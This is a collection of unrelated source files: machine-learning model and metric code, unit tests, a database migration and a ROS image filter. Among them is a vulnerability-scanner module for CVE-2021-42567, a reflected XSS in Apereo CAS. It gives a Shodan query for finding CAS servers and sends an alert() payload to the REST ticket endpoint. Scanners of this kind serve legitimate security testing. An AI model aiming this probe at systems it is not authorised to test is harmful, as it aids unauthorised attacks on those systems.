def __init__(self, config, train_set=None):
self.config = config
if self.config['model_name'] == 'GraphClf':
self.net_module = GraphClf
elif self.config['model_name'] == 'TextGraphRegression':
self.net_module = TextGraphRegression
elif self.config['model_name'] == 'TextGraphClf':
self.net_module = TextGraphClf
else:
raise RuntimeError('Unknown model_name: {}'.format(self.config['model_name']))
print('[ Running {} model ]'.format(self.config['model_name']))
if config['data_type'] == 'text':
saved_vocab_file = os.path.join(config['data_dir'], '{}_seed{}.vocab'.format(config['dataset_name'], config.get('data_seed', 1234)))
self.vocab_model = VocabModel.build(saved_vocab_file, train_set, self.config)
if config['task_type'] == 'regression':
assert config['out_predictions']
self.criterion = F.mse_loss
self.score_func = r2_score
self.metric_name = 'r2'
elif config['task_type'] == 'classification':
self.criterion = F.nll_loss
self.score_func = accuracy
self.metric_name = 'acc'
else:
self.criterion = F.nll_loss
self.score_func = None
self.metric_name = None
if self.config['pretrained']:
self.init_saved_network(self.config['pretrained'])
else:
# Building network.
self._init_new_network()
num_params = 0
for name, p in self.network.named_parameters():
print('{}: {}'.format(name, str(p.size())))
num_params += p.numel()
print('#Parameters = {}\n'.format(num_params))
self._init_optimizer()
def init_saved_network(self, saved_dir):
_ARGUMENTS = ['word_embed_dim', 'hidden_size', 'f_qem', 'f_pos', 'f_ner',
'word_dropout', 'rnn_dropout',
'ctx_graph_hops', 'ctx_graph_topk',
'score_unk_threshold', 'score_yes_threshold',
'score_no_threshold']
# Load all saved fields.
fname = os.path.join(saved_dir, Constants._SAVED_WEIGHTS_FILE)
print('[ Loading saved model %s ]' % fname)
saved_params = torch.load(fname, map_location=lambda storage, loc: storage)
self.state_dict = saved_params['state_dict']
# for k in _ARGUMENTS:
# if saved_params['config'][k] != self.config[k]:
# print('Overwrite {}: {} -> {}'.format(k, self.config[k], saved_params['config'][k]))
# self.config[k] = saved_params['config'][k]
if self.config['data_type'] == 'text':
w_embedding = self._init_embedding(len(self.vocab_model.word_vocab), self.config['word_embed_dim'])
self.network = self.net_module(self.config, w_embedding, self.vocab_model.word_vocab)
else:
self.network = self.net_module(self.config)
# Merge the arguments
if self.state_dict:
merged_state_dict = self.network.state_dict()
for k, v in self.state_dict['network'].items():
if k in merged_state_dict:
merged_state_dict[k] = v
self.network.load_state_dict(merged_state_dict)
def _init_new_network(self):
if self.config['data_type'] == 'text':
w_embedding = self._init_embedding(len(self.vocab_model.word_vocab), self.config['word_embed_dim'],
pretrained_vecs=self.vocab_model.word_vocab.embeddings)
self.network = self.net_module(self.config, w_embedding, self.vocab_model.word_vocab)
else:
self.network = self.net_module(self.config)
def _init_optimizer(self):
parameters = [p for p in self.network.parameters() if p.requires_grad]
if self.config['optimizer'] == 'sgd':
self.optimizer = optim.SGD(parameters, self.config['learning_rate'],
momentum=self.config['momentum'],
weight_decay=self.config['weight_decay'])
elif self.config['optimizer'] == 'adam':
self.optimizer = optim.Adam(parameters, lr=self.config['learning_rate'], weight_decay=self.config['weight_decay'])
elif self.config['optimizer'] == 'adamax':
self.optimizer = optim.Adamax(parameters, lr=self.config['learning_rate'])
elif self.config['optimizer'] == 'radam':
self.optimizer = RAdam(parameters, lr=self.config['learning_rate'], weight_decay=self.config['weight_decay'])
else:
raise RuntimeError('Unsupported optimizer: %s' % self.config['optimizer'])
self.scheduler = ReduceLROnPlateau(self.optimizer, mode='max', factor=self.config['lr_reduce_factor'], \
patience=self.config['lr_patience'], verbose=True)
def _init_embedding(self, vocab_size, embed_size, pretrained_vecs=None):
"""Initializes the embeddings
"""
return nn.Embedding(vocab_size, embed_size, padding_idx=0,
_weight=torch.from_numpy(pretrained_vecs).float()
if pretrained_vecs is not None else None)
def save(self, dirname):
params = {
'state_dict': {
'network': self.network.state_dict(),
},
'config': self.config,
'dir': dirname,
}
try:
torch.save(params, os.path.join(dirname, Constants._SAVED_WEIGHTS_FILE))
except BaseException:
print('[ WARN: Saving failed... continuing anyway. ]')
def clip_grad(self):
# Clip gradients
if self.config['grad_clipping']:
parameters = [p for p in self.network.parameters() if p.requires_grad]
torch.nn.utils.clip_grad_norm_(parameters, self.config['grad_clipping'])
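# Minimal usage sketch (hypothetical config values; the underlying network
# module, e.g. GraphClf, reads further config keys not shown here):
#
#   config = {'model_name': 'GraphClf', 'data_type': 'network',
#             'task_type': 'classification', 'pretrained': None,
#             'optimizer': 'adam', 'learning_rate': 1e-3, 'weight_decay': 5e-4,
#             'lr_reduce_factor': 0.5, 'lr_patience': 10, ...}
#   model = Model(config)
#   model.save('/tmp/idgl_checkpoint')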
def train_batch(batch, network, vocab, criterion, forcing_ratio, rl_ratio, config, wmd=None):
network.train(True)
with torch.set_grad_enabled(True):
ext_vocab_size = batch['oov_dict'].ext_vocab_size if batch['oov_dict'] else None
network_out = network(batch, batch['targets'], criterion,
forcing_ratio=forcing_ratio, partial_forcing=config['partial_forcing'], \
sample=config['sample'], ext_vocab_size=ext_vocab_size, \
include_cover_loss=config['show_cover_loss'])
if rl_ratio > 0:
batch_size = batch['context'].shape[0]
sample_out = network(batch, saved_out=network_out, criterion=criterion, \
criterion_reduction=False, criterion_nll_only=True, \
sample=True, ext_vocab_size=ext_vocab_size)
baseline_out = network(batch, saved_out=network_out, visualize=False, \
ext_vocab_size=ext_vocab_size)
sample_out_decoded = sample_out.decoded_tokens.transpose(0, 1)
baseline_out_decoded = baseline_out.decoded_tokens.transpose(0, 1)
neg_reward = []
for i in range(batch_size):
scores = eval_batch_output([batch['target_src'][i]], vocab, batch['oov_dict'],
[sample_out_decoded[i]], [baseline_out_decoded[i]])
greedy_score = scores[1][config['rl_reward_metric']]
reward_ = scores[0][config['rl_reward_metric']] - greedy_score
if config['rl_wmd_ratio'] > 0:
# Add word mover's distance
sample_seq = batch_decoded_index2word([sample_out_decoded[i]], vocab, batch['oov_dict'])[0]
greedy_seq = batch_decoded_index2word([baseline_out_decoded[i]], vocab, batch['oov_dict'])[0]
sample_wmd = -wmd.distance(sample_seq, batch['target_src'][i]) / max(len(sample_seq.split()), 1)
greedy_wmd = -wmd.distance(greedy_seq, batch['target_src'][i]) / max(len(greedy_seq.split()), 1)
wmd_reward_ = sample_wmd - greedy_wmd
wmd_reward_ = max(min(wmd_reward_, config['max_wmd_reward']), -config['max_wmd_reward'])
reward_ += config['rl_wmd_ratio'] * wmd_reward_
neg_reward.append(reward_)
neg_reward = to_cuda(torch.Tensor(neg_reward), network.device)
# if sample > baseline, the reward is positive (i.e. good exploration), rl_loss is negative
rl_loss = torch.sum(neg_reward * sample_out.loss) / batch_size
rl_loss_value = torch.sum(neg_reward * sample_out.loss_value).item() / batch_size
loss = (1 - rl_ratio) * network_out.loss + rl_ratio * rl_loss
loss_value = (1 - rl_ratio) * network_out.loss_value + rl_ratio * rl_loss_value
metrics = eval_batch_output(batch['target_src'], vocab, \
batch['oov_dict'], baseline_out.decoded_tokens)[0]
else:
loss = network_out.loss
loss_value = network_out.loss_value
metrics = eval_batch_output(batch['target_src'], vocab, \
batch['oov_dict'], network_out.decoded_tokens)[0]
return loss, loss_value, metrics
def accuracy(labels, output):
preds = output.max(1)[1].type_as(labels)
correct = preds.eq(labels).double()
correct = correct.sum().item()
return correct / len(labels)
|
2021/CVE-2021-42567/poc/pocsploit/CVE-2021-42567.py | hjyuan/reapoc | 421 | 12688337 | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Apereo CAS Reflected Cross-Site Scripting''',
"description": '''Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.''',
"severity": "medium",
"references": [
"https://apereo.github.io/2021/10/18/restvuln/",
"https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html",
"https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md",
"https://nvd.nist.gov/vuln/detail/CVE-2021-42567",
"https://github.com/apereo/cas/releases"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"cvss-score": "",
"cve-id": "CVE-2021-42567",
"cwe-id": "CWE-79"
},
"metadata":{
"vuln-target": "",
"shodan-query":"""http.title:'CAS - Central Authentication Service'"""
},
"tags": ["cve", "cve2021", "apereo", "xss", "cas"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/cas/v1/tickets/"""
method = "POST"
data = """username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=<PASSWORD>"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""<img/src/onerror=alert(document.domain)>""" in resp0.text and """java.util.HashMap""" in resp0.text) and (resp0.status_code == 401):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
malaya_speech/train/model/pix2pix/discriminator.py | ishine/malaya-speech | 111 | 12688345 | import tensorflow as tf
from .layer import *
class Discriminator:
def __init__(self, inputs, targets, ndf=64):
n_layers = 3
layers = []
input = tf.concat([inputs, targets], axis=3)
with tf.variable_scope('layer_1'):
convolved = discrim_conv(input, ndf, stride=2)
rectified = lrelu(convolved, 0.2)
layers.append(rectified)
for i in range(n_layers):
with tf.variable_scope('layer_%d' % (len(layers) + 1)):
out_channels = ndf * min(2 ** (i + 1), 8)
stride = 1 if i == n_layers - 1 else 2
convolved = discrim_conv(
layers[-1], out_channels, stride=stride
)
normalized = batchnorm(convolved)
rectified = lrelu(normalized, 0.2)
layers.append(rectified)
with tf.variable_scope('layer_%d' % (len(layers) + 1)):
convolved = discrim_conv(rectified, out_channels=1, stride=1)
output = tf.sigmoid(convolved)
layers.append(output)
self.logits = layers[-1]
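# Usage sketch (TF1 graph mode, NHWC image tensors; the 256x256x3 shapes are
# assumptions):
#
#   inputs = tf.placeholder(tf.float32, [None, 256, 256, 3])
#   targets = tf.placeholder(tf.float32, [None, 256, 256, 3])
#   disc = Discriminator(inputs, targets, ndf=64)
#   patch_scores = disc.logits  # per-patch real/fake scores after the sigmoid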
|
ssim.py | ebartrum/NovelViewSynthesis-TensorFlow | 192 | 12688359 | import tensorflow as tf
import numpy as np
def _tf_fspecial_gauss(size, sigma, ch=1):
"""Function to mimic the 'fspecial' gaussian MATLAB function
"""
x_data, y_data = np.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1]
x_data = np.expand_dims(x_data, axis=-1)
x_data = np.expand_dims(x_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
x = tf.constant(x_data, dtype=tf.float32)
y = tf.constant(y_data, dtype=tf.float32)
g = tf.exp(-((x**2 + y**2)/(2.0*sigma**2)))
g = tf.tile(g, [1, 1, ch, 1])
return g / tf.reduce_sum(g)
def tf_ssim(img1, img2, cs_map=False, mean_metric=True, size=11, sigma=0.5):
img1 = tf.image.rgb_to_grayscale(img1)
img2 = tf.image.rgb_to_grayscale(img2)
window = _tf_fspecial_gauss(size, sigma,
ch=img1.get_shape().as_list()[-1]) # window shape [size, size]
K1 = 0.01
K2 = 0.03
L = 1 # depth of image (255 in case the image has a differnt scale)
C1 = (K1*L)**2
C2 = (K2*L)**2
mu1 = tf.nn.conv2d(img1, window, strides=[1, 1, 1, 1], padding='VALID')
mu2 = tf.nn.conv2d(img2, window, strides=[1, 1, 1, 1], padding='VALID')
mu1_sq = mu1*mu1
mu2_sq = mu2*mu2
mu1_mu2 = mu1*mu2
sigma1_sq = tf.nn.conv2d(img1*img1, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_sq
sigma2_sq = tf.nn.conv2d(img2*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu2_sq
sigma12 = tf.nn.conv2d(img1*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_mu2
if cs_map:
value = (
((2*mu1_mu2 + C1) * (2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)
), (2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2)
)
else:
value = ((2*mu1_mu2 + C1)*(2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))
if mean_metric:
value = tf.reduce_mean(value)
return value
def tf_ms_ssim(img1, img2, mean_metric=True, level=5):
weight = tf.constant([0.0448, 0.2856, 0.3001, 0.2363, 0.1333], dtype=tf.float32)
mssim = []
mcs = []
for l in range(level):
ssim_map, cs_map = tf_ssim(img1, img2, cs_map=True, mean_metric=False)
mssim.append(tf.reduce_mean(ssim_map))
mcs.append(tf.reduce_mean(cs_map))
filtered_im1 = tf.nn.avg_pool(img1, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
filtered_im2 = tf.nn.avg_pool(img2, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
img1 = filtered_im1
img2 = filtered_im2
    # list to tensor of dim D+1 (tf.stack; named tf.pack before TensorFlow 1.0)
    mssim = tf.stack(mssim, axis=0)
    mcs = tf.stack(mcs, axis=0)
value = (tf.reduce_prod(
mcs[0:level-1]**weight[0:level-1]) * (mssim[level-1]**weight[level-1]))
if mean_metric:
value = tf.reduce_mean(value)
return value
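# Usage sketch (TF1 graph mode; inputs are RGB batches scaled to [0, 1],
# matching L = 1 above):
#
#   img_a = tf.placeholder(tf.float32, [1, 256, 256, 3])
#   img_b = tf.placeholder(tf.float32, [1, 256, 256, 3])
#   ssim_val = tf_ssim(img_a, img_b)        # mean single-scale SSIM
#   ms_ssim_val = tf_ms_ssim(img_a, img_b)  # multi-scale variant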
|
test/test_slimta_edge.py | nanojob/python-slimta | 141 | 12688394 | import time
import unittest
from mox3.mox import MoxTestBase
from slimta.edge import Edge, EdgeServer
class TestEdge(MoxTestBase, unittest.TestCase):
def test_handoff(self):
self.mox.StubOutWithMock(time, 'time')
env = self.mox.CreateMockAnything()
queue = self.mox.CreateMockAnything()
time.time().AndReturn(12345)
queue.enqueue(env).AndReturn('asdf')
self.mox.ReplayAll()
edge = Edge(queue, 'test.example.com')
self.assertEqual('asdf', edge.handoff(env))
self.assertEqual('test.example.com', env.receiver)
self.assertEqual(12345, env.timestamp)
def test_handoff_error(self):
env = self.mox.CreateMockAnything()
queue = self.mox.CreateMockAnything()
queue.enqueue(env).AndRaise(RuntimeError)
self.mox.ReplayAll()
edge = Edge(queue)
with self.assertRaises(RuntimeError):
edge.handoff(env)
def test_kill(self):
queue = self.mox.CreateMockAnything()
self.mox.ReplayAll()
edge = Edge(queue)
edge.kill()
class TestEdgeServer(MoxTestBase, unittest.TestCase):
def test_edge_interface(self):
edge = EdgeServer(('127.0.0.1', 0), None)
with self.assertRaises(NotImplementedError):
edge.handle(None, None)
def test_handle(self):
queue = self.mox.CreateMockAnything()
sock = self.mox.CreateMockAnything()
edge = EdgeServer(('127.0.0.1', 0), queue)
self.mox.StubOutWithMock(edge, 'handle')
sock.fileno().AndReturn(15)
edge.handle(sock, 'test address')
self.mox.ReplayAll()
try:
edge.server.pre_start()
except AttributeError:
edge.server.init_socket()
edge._handle(sock, 'test address')
def test_handle_error(self):
queue = self.mox.CreateMockAnything()
sock = self.mox.CreateMockAnything()
edge = EdgeServer(('127.0.0.1', 0), queue)
self.mox.StubOutWithMock(edge, 'handle')
sock.fileno().AndReturn(15)
edge.handle(sock, 5).AndRaise(RuntimeError)
self.mox.ReplayAll()
try:
edge.server.pre_start()
except AttributeError:
edge.server.init_socket()
with self.assertRaises(RuntimeError):
edge._handle(sock, 5)
def test_kill(self):
edge = EdgeServer(('127.0.0.1', 0), None)
self.mox.StubOutWithMock(edge.server, 'stop')
edge.server.stop()
self.mox.ReplayAll()
edge.kill()
def test_run(self):
edge = EdgeServer(('127.0.0.1', 0), None)
self.mox.StubOutWithMock(edge.server, 'start')
self.mox.StubOutWithMock(edge.server, 'serve_forever')
edge.server.start()
edge.server.serve_forever()
self.mox.ReplayAll()
edge._run()
# vim:et:fdm=marker:sts=4:sw=4:ts=4
|
old_stuff/harold/tests/test_static_ctrl_design.py | weightan/quaternion_polynomials | 154 | 12688414 | from numpy import eye, array, sort, empty
from scipy.linalg import block_diag, eigvals
from scipy.signal.filter_design import _cplxpair
from numpy.testing import (assert_almost_equal, assert_array_almost_equal,
assert_array_equal)
from pytest import raises as assert_raises
from harold import lqr, ackermann, State, Transfer, haroldcompanion
from harold._static_ctrl_design import _get_pole_reps
def test_lqr_arguments():
# First arg is not LTI
assert_raises(ValueError, lqr, 1, 1)
# Static Gain
assert_raises(ValueError, lqr, State(1), 1)
# Wrong string
assert_raises(ValueError, lqr, Transfer(1, [1, 1]), 1, weight_on='asdf')
# scalar matrices
H = Transfer(1, [1, 1])
k, x, e = lqr(H, 3)
assert_almost_equal(array([k[0, 0], x[0, 0], e[0]]), [1, 1, -2+0j])
def test_simple_lqr():
# Example taken from <NAME>'s MAE280B lecture notes
H = State([[0, 0, 1, 0],
[0, 0, 0, 1],
[4.03428022844288e-06, 0, 0, 0.0515652322798669],
[0, 0, -0.000104315254033883, 0]],
[[0, 0], [1e-5/3, 0], [0, 0], [0, 0.01]],
eye(4))
k, _, _ = lqr(H[:, 1], eye(4))
H.a = H.a.T
f, _, _ = lqr(H[:, 0], block_diag(0, 0, 1e-5, 1e-5), 0.1)
assert_almost_equal(k, array([[1.00554916, -1, 52.52180106, 18.51107167]]))
assert_almost_equal(f, array([[-577.370350, 173.600463,
0.383744946, 0.050228534]]), decimal=5)
def test_simple_lqry():
# Scalar matrices
H = State(1, 1, 1, 1)
k, x, e = lqr(H, Q=3, weight_on='output')
assert_almost_equal(array([k[0, 0], x[0, 0], e[0]]), [1.5, 3, -0.5+0j])
# Wrong S shape
assert_raises(ValueError, lqr, H, Q=3, S=eye(2), weight_on='output')
def test_simple_dlqr():
# Example taken from <NAME>'s MAE280B lecture notes
H = State([[0, 0, 1, 0],
[0, 0, 0, 1],
[4.03428022844288e-06, 0, 0, 0.0515652322798669],
[0, 0, -0.000104315254033883, 0]],
[[0, 0], [1e-5/3, 0], [0, 0], [0, 0.01]],
eye(4), dt=0.1)
k, _, _ = lqr(H[:, 1], eye(4))
H.a = H.a.T
f, _, _ = lqr(H[:, 0], block_diag(0, 0, 1e-5, 1e-5), 0.1)
assert_almost_equal(k, array([[0, 0, -2.08727337333631e-06, 0]]))
assert_almost_equal(f, array([[1.71884123e-11, 0, 0, -1.79301359e-15]]))
def test_ackermann_args():
# Not SIxO system
G = State(eye(2), eye(2), eye(2))
assert_raises(ValueError, ackermann, G, [1, 2])
# Wrong # of poles
G = State(eye(2), [[1], [0]], [1, 0])
assert_raises(ValueError, ackermann, G, [1, 2, 3])
def test_ackermann_controllable():
#
A = haroldcompanion([1, 6, 5, 1])
B = eye(3)[:, [-1]]
p = [-10, -9, -8]
K = ackermann((A, B), p)
pa = eigvals(A - B@K)
assert_array_almost_equal(array(p, dtype=complex), sort(pa))
def test_ackermann_uncontrollable():
A = block_diag(haroldcompanion([1, 6, 5, 1]), 1)
B = eye(4)[:, [-2]]
p = [-10, -9, -8, -7]
assert_raises(ValueError, ackermann, (A, B), p)
def byersnash_A_B_test_pairs():
ABs = [
# Chemical Reactor (Munro 1979)
(array([[1.38, -0.2077, 6.715, -5.676],
[-0.5814, -4.29, 0, 0.675],
[1.067, 4.273, -6.654, 5.893],
[0.048, 4.273, 1.343, -2.104]]),
array([[0, 0],
[5.679, 0],
[1.136, -3.146],
[1.136, 0]])),
# Distillation Column (<NAME> 1977)
(array([[-0.1094, 0.0628, 0, 0, 0],
[1.306, -2.132, 0.9807, 0, 0],
[0, 1.595, -3.149, 1.547, 0],
[0, 0.0355, 2.632, -4.257, 1.855],
[0, 0.0023, 0, 0.1636, -0.1625]]),
array([[0, 0],
[0.638, 0],
[0.0838, -0.1396],
[0.1004, -0.206],
[0.0063, -0.0128]])),
# Nuclear rocket engine (<NAME> 1974)
(array([[-65.0, 65, -19.5, 19.5],
[0.1, -0.1, 0, 0],
[1, 0, -0.5, -1],
[0, 0, 0.4, 0]]),
array([[65., 0],
[0, 0],
[0, 0],
[0, 0.4]])),
# MIMO system (Atkinson, 1985)
(array([[0, 1, 0],
[0, 0, 1],
[-6, -11, -6]]),
array([[1, 1],
[0, 1],
[1, 1]])),
# Drum boiler (Bengtsson 1973)
(array([[-0.129, 0, 0.396, 0.25, 0.00191],
[0.0329, 0, -0.00779, 0.0122, -0.621],
[0.00718, 0, -0.1, 0.000887, -0.0385],
[0.00411, 0, 0, -0.0822, 0],
[0.00351, 0, 0.0035, 0.00426, -0.0743]]),
array([[0, 0.1390],
[0, 0.0359],
[0, -0.0989],
[0.0249, 0],
[0, -0.00534]])),
# Miminis random example #1
(array([[5.8765, 9.3456, 4.5634, 9.3520],
[6.6526, 0.5867, 3.5829, 0.6534],
[0.0000, 9.6738, 7.4876, 4.7654],
[0.0000, 0.0000, 6.6784, 2.5678]]),
array([[3.9878, 0.5432],
[0.0000, 2.7650],
[0.0000, 0.0000],
[0.0000, 0.0000]])),
# Miminis random example #2
(array([[.5257, .8544, .5596, .5901, .0259, .6213, .7227, .5617],
[.9931, .0643, .1249, .3096, .5174, .3455, .8977, .4682],
[.6489, .8279, .7279, .2552, .3917, .7065, .2428, .7795],
[.9923, .9262, .2678, .6252, .2414, .5211, .4338, .9677],
[.0000, .5667, .5465, .1157, .5064, .2870, .7901, .9809],
[.0000, .0000, .8672, .6117, .4236, .6503, .5069, .8187],
[.0000, .0000, .0000, .0000, .2894, .0881, .5233, .4257],
[.0000, .0000, .0000, .0000, .0000, .4499, .5597, .2462]]),
array([[0.9230, 0.3950, 0.8325],
[0.0000, 0.0366, 0.6105],
[0.0000, 0.0000, 0.1871],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000]])),
# Aircraft control example I (Kautsky and Nichols 1983)
(array([[0, 1, 0, 0],
[1.40e-4, -2.04, -1.95, -1.33e-2],
[-2.51e-4, 1, -1.32, -2.38e-2],
[-5.61e-1, 0, 0.358, -2.79e-1]]),
array([[0, 0, 0],
[-5.33, 6.45e-3, -2.67e-1],
[-1.60e-1, -1.16e-2, -2.51e-1],
[0, 1.06e-1, 8.62e-2]])),
# Aircraft control example II (Kautsky and Nichols 1983)
(array([[0, 1, 0, 0],
[5.32e-7, -4.18e-1, -0.12, -2.32e-2],
[-4.62e-9, 1, -0.752, -2.39e-2],
[-5.61e-1, 0, 0.3, -1.74e-2]]),
array([[0, 0],
[-1.72e-1, 7.45e-6],
[-2.82e-2, -7.78e-5],
[0, 3.69e-3]])),
# Symmetric example (Kautsky and Nichols 1983)
(array([[-3.624, 4.9567e-2, -2.4564e-1, 1.3853e-2],
[3.3486e-1, -1.8875, -8.1251e-1, -2.8102e-1],
[-1.9958e-1, -1.1335, -2.2039, -4.5523e-1],
[1.3784e-1, -4.7140e-1, -3.3229e-1, -4.0605]]),
array([[2.3122e-1, 3.0761e-1, 3.6164e-1, 3.3217e-1],
[8.8339e-1, 2.1460e-1, 5.6642e-1, 5.0153e-1]]).T),
# Ad-hoc ill-conditioned example (Byers and Nash 1989)
(array([[0, 0, 0, 0],
[1, 10, 100, 1000],
[0, 1, 10, 100],
[0, 0, 1, 10]]),
array([[1, 0],
[0, 1],
[0, 0],
[0, 0]]))
]
# Return a generator
return (x for x in ABs)
def _test_get_pole_reps():
# Only complex
p = array([1.+1j, 1-1j, 2.+1j, 2-1j])
pr, nc, nr = _get_pole_reps(p)
for x in range(2):
assert_array_equal(pr[x], empty((0, 2)))
assert nc == 4
assert nr == 0
# Only real
p = array([1, 2, 3])
pr, nc, nr = _get_pole_reps(p)
for x in range(2):
assert_array_equal(pr[x], empty((0, 2)))
assert nc == 0
assert nr == 3
# Mixed, no reps
p = array([1.+1j, 1-1j, 3])
pr, nc, nr = _get_pole_reps(p)
for x in range(2):
assert_array_equal(pr[x], empty((0, 2)))
assert nc == 2
assert nr == 1
# Mixed, complex reps
p = array([1.+1j, 1-1j, 1.+1j, 1-1j, 3])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], array([[0, 2]]))
assert_array_equal(pr[1], empty((0, 2)))
assert nc == 4
assert nr == 1
# Mixed real reps
p = array([1.+1j, 1-1j, 1., 1])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], empty((0, 2)))
assert_array_equal(pr[1], array([[2, 4]]))
assert nc == 2
assert nr == 2
# Mixed real reps, real dangling
p = array([1.+1j, 1-1j, 1., 1, 0.54, 3.8])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], empty((0, 2)))
assert_array_equal(pr[1], array([[3, 5]]))
assert nc == 2
assert nr == 4
# Mixed complex reps, complex dangling
p = array([1.+1j, 1-1j, 1.+1j, 1-1j, 0.+1j, 0-1j, 0.5, 3.])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], array([[1, 3]]))
assert_array_equal(pr[1], empty((0, 2)))
assert nc == 6
assert nr == 2
# Mixed reps and dangling
p = array([1.+1j, 1-1j, 1.+1j, 1-1j,
2.+1j, 2-1j,
3.+1j, 3-1j, 3.+1j, 3-1j, 3.+1j, 3-1j,
4.+1j, 4-1j,
0,
0.5, 0.5,
3.,
6, 6, 6])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], array([[0, 2],
[3, 6]]))
assert_array_equal(pr[1], array([[15, 17],
[18, 21]]))
assert nc == 14
assert nr == 7
|
python_modules/dagster/dagster/core/storage/schedules/sqlite/alembic/versions/8ccbed5060b8_0_10_0_create_new_schedule_tables.py | dbatten5/dagster | 4,606 | 12688418 | """0.10.0 create new schedule tables
Revision ID: 8ccbed5060b8
Revises: <PASSWORD>
Create Date: 2021-01-13 12:56:41.971500
"""
from dagster.core.storage.migration.utils import create_0_10_0_schedule_tables
# revision identifiers, used by Alembic.
revision = "8ccbed5060b8"
down_revision = "<PASSWORD>"
branch_labels = None
depends_on = None
def upgrade():
create_0_10_0_schedule_tables()
def downgrade():
pass
|
pythonturtle/my_turtle.py | Cleverect/PythonTurtle | 114 | 12688438 | import wx
from .misc.helpers import deg_to_rad, rad_to_deg
from .misc.vector import Vector
# Size of the turtle canvas. We assume no user will have a screen
# so big that the canvas will be bigger than this.
BITMAP_SIZE = Vector((2000, 1200))
# Center of the canvas.
origin = BITMAP_SIZE / 2.0
def to_my_angle(angle):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return rad_to_deg(-angle) - 180
def from_my_angle(angle):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return deg_to_rad(-angle + 180)
def from_my_pos(pos):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return -pos + origin
def to_my_pos(pos):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return -pos + origin
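# Worked example (assumes Vector supports the negation and addition used
# above): with BITMAP_SIZE = (2000, 1200), origin is (1000.0, 600.0), so
# to_my_pos(Vector((0, 0))) gives the canvas centre, and applying the
# transform twice returns the original position (it is its own inverse).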
class Turtle:
"""
A Turtle object defines a turtle by its attributes, such as
position, orientation, color, etc. See source of __init__ for
a complete list.
"""
def __init__(self):
self.pos = Vector((0, 0))
self.orientation = 180
self.color = "red"
self.width = 3
self.visible = True
self.pen_down = True
# the `clear` attribute is only made True momentarily when
# the `clear()` function is called by the user to clear the screen.
self.clear = False
self.SPEED = 400.0 # Pixels per second
self.ANGULAR_SPEED = 360.0 # Degrees per second
def give_pen(self):
"""
Gives a wxPython pen that corresponds to the color, width,
and pen_downity of the Turtle instance.
"""
return wx.Pen(self.color,
self.width,
wx.SOLID if self.pen_down else wx.TRANSPARENT)
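# Usage sketch (assumes a running wx.App so that wx.Pen can be created):
#
#   turtle = Turtle()
#   pen = turtle.give_pen()   # wx.Pen matching the turtle's color and width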
|
cam_lecture/scripts/edge_filter_compressed.py | yasutomo57jp/ros_lecture | 110 | 12688469 | #!/usr/bin/env python
import rospy
import sys
import cv2
from sensor_msgs.msg import Image, CompressedImage, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
class cvBridgeDemo:
def __init__(self):
self.node_name = "cv_bridge_demo_compressed"
rospy.init_node(self.node_name)
rospy.on_shutdown(self.cleanup)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("input_image", CompressedImage, self.image_callback, queue_size=1)
self.image_pub = rospy.Publisher('output_image', Image, queue_size=1)
def image_callback(self, ros_image_compressed):
try:
np_arr = np.fromstring(ros_image_compressed.data, np.uint8)
input_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
except CvBridgeError, e:
print e
output_image = self.process_image(input_image)
self.image_pub.publish(self.bridge.cv2_to_imgmsg(output_image, "mono8"))
cv2.imshow(self.node_name, output_image)
cv2.waitKey(1)
def process_image(self, frame):
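        # Pipeline: BGR frame -> grayscale -> 7x7 box blur -> Canny edges (thresholds 15/30)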
grey = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
grey = cv2.blur(grey, (7, 7))
edges = cv2.Canny(grey, 15.0, 30.0)
return edges
def cleanup(self):
cv2.destroyAllWindows()
if __name__ == '__main__':
cvBridgeDemo()
rospy.spin() |
